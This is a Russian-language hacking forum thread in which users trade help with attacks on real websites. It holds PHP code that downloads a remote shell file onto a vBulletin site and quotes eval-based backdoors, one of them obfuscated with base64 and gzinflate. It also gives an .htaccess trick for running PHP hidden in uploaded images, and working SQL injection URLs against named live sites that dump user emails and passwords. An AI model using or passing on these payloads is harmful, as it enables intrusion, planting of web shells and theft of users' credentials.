Проблема с заливкой шелла на vb. Всё делаю как надо, ajax.php выдает всё ок, но когда захожу по пути где должен быть шелл, его там не оказывается, а просто открывается главная стр. сайта. либо 404 (зависит от сайта) Код: Code: $linky="http://ololo.com/papka/ld.txt"; $saved="./name.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); echo 'done'; fclose($from); Возможно проблема в том, что обнаружил в плагинах кого то до меня. 2 плагина с такими кодами: Code: eval($_REQUEST[cmd123]); и Code: eval(gzinflate(base64_decode("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"))); Плагины удалил, не помогло. Можно ли это исправить? модераторам: Прошу до завтрашнего вечера не удалять
http://forum.antichat.ru/showpost.php?p=2878106&postcount=18342 http://forum.antichat.ru/showpost.php?p=2878121&postcount=18344 http://forum.antichat.ru/showpost.php?p=2878125&postcount=18345
Boolean, в таком случае ajax.php должен был выбить ошибку, а не то что всё ок. Я тоже думал что мб это в этом проблема, но проверил кучу папок, а результат тот же.
Сорри, если вопрос очень нубский. У меня следующего плана вопрос. В общем имеется скрипт, который аплоадит картинки на сервер - профильные аватарки.В картинку, которую я залил, я вставил php код, а в папке, которую аплоадятся аватарки, отсутствует .htaccess, но тем не менее скрипт не дает заливать файлы с расширением php.Можно ли каким-либо образом исполнить php код из картинки ? Залитая картинка полностью функциональна при этом
Ну если на есть LFI уязвимости, то можно проинклудить картинку. Не совсем понял причем тут .htaccess, когда _скрипт_ не дает заливать файлы с расширением .php. Он и не должен был бы препятствовать этому. Попробуй сам загрузить .htaccess: AddType application/x-httpd-php .jpg И позже заливать .jpg шелл. Или пробуй .php5 и так далее.
Там две БД. http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_schema,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+ Вывод таблиц http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
Такая ситуация . как можно вывести данные из таблиц в сортировке с 1й записи. , а то выводиться все с 166 позиции. ??? как то пример ---articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3b,email,0x3b,passwd)),4,5+from+база.навание_таблицы--+
Что то не получается так http://goldsauna.ru/articles.html?id=7'+union+select+1,2,(select(@x)from(select(@x:=0x00,(select(0)from(goldsauna.users)where(0x00)in(@x:=concat(@x,0x3c62723e,id,0x3a,name))))x),4,5--+ и зачем в конце x между скобками? --- ORDER BY `id` ASC -а как это подставлять перед id? или где почитать можно по этому поводу?
--articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.навание_таблицы+ORDER+BY+id+ASC+--+
Да нет они там есть. я знаю точно. сейчас обосную. При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22.... пример --ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4,5+from+goldsauna.users+ORDER+BY+id+ASC+--+ а при двойном запросе с добавлением name например, выводиться уже с позиции 166
